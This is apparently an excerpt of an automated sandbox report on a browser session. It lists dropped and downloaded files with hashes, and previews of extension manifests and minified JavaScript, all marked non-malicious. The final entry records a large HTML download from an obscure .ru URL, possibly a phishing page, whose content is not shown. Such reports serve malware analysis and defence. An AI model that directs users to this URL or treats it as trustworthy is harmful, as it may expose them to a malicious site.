                                                                                                                                                                                    Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):854
                                                                                                                                                                                    Entropy (8bit):4.284628987131403
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                    MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                    SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                    SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                    SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2525
                                                                                                                                                                                    Entropy (8bit):5.417954053901
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                    MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                    SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                    SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                    SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):97
                                                                                                                                                                                    Entropy (8bit):4.862433271815736
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                    MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                    SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                    SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                    SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):122218
                                                                                                                                                                                    Entropy (8bit):5.439997574414675
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                    MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                    SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                    SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                                    SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ha=ea(this);function r(a,b){if(b)a:{var c=ha;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):291
                                                                                                                                                                                    Entropy (8bit):4.65176400421739
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                    MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                    SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                    SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                    SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):130866
                                                                                                                                                                                    Entropy (8bit):5.425065147784983
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                    MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                                    SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                    SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                    SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var fa=ea(this);function r(a,b){if(b)a:{var c=fa;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1753
                                                                                                                                                                                    Entropy (8bit):5.8889033066924155
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                    MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                    SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                    SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                    SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):9815
                                                                                                                                                                                    Entropy (8bit):6.1716321262973315
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                    MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                    SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                    SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                    SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):10388
                                                                                                                                                                                    Entropy (8bit):6.174387413738973
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                    MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                    SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                    SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                    SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):962
                                                                                                                                                                                    Entropy (8bit):5.698567446030411
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                    MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                    SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                    SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                    SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:Google Chrome extension, version 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):11185
                                                                                                                                                                                    Entropy (8bit):7.951995436832936
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                    MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                    SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                    SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                    SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):89501
                                                                                                                                                                                    Entropy (8bit):5.289893677458563
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                                                                    MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                                    SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                                    SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                                    SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                    Entropy (8bit):3.5
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:H+rYn:D
                                                                                                                                                                                    MD5:F1C9C44E663E7E62582E3F5B236C1C72
                                                                                                                                                                                    SHA1:E142F3A0C2D1CDF175A5C3AF43AD66FEFE208B1F
                                                                                                                                                                                    SHA-256:D843E67FBFA1F5CB0024062861EE26860C5A866F80755CF39B3465459A8538B9
                                                                                                                                                                                    SHA-512:19FE62CB9D884BB3424C51DD15E74EB22E5A639BABF8398BACEBB781862296FA0D7AEE39C88CB9C7AF5791FD58830AC3433F5C6BD94B1BA3912AB33151E93452
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAnZq_5Xa_QoWxIFDTcwqTA=?alt=proto
                                                                                                                                                                                    Preview:CgkKBw03MKkwGgA=
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (65348), with CRLF line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):447719
                                                                                                                                                                                    Entropy (8bit):3.1192616633005272
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:JktYmG/kw9raqMFCtK7+V+nktYmG/kw9raqMFCtK7+V+xlrilrC:JIYR/kw9r8I6IYR/kw9r8Ieo4
                                                                                                                                                                                    MD5:82F2FCA9F29CB40CB38C895B622BF586
                                                                                                                                                                                    SHA1:A149A2501FBB10AF7B816E62515A269932952CB3
                                                                                                                                                                                    SHA-256:EE44541AFB3C47B3A95FC889223A469038DCC4852911D8702EDCCDE8704A708D
                                                                                                                                                                                    SHA-512:E59B7C92CCEE58B65ABD653036DA1AE692AA82E67D788F0F517EDF0D76558E58712676D40CCFECCBE51F2DC6B5E056D33A94E85D5E495998A3A4D7B7DA2D8545
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://bryf.atchirlisc.ru/EeMAGvIe/
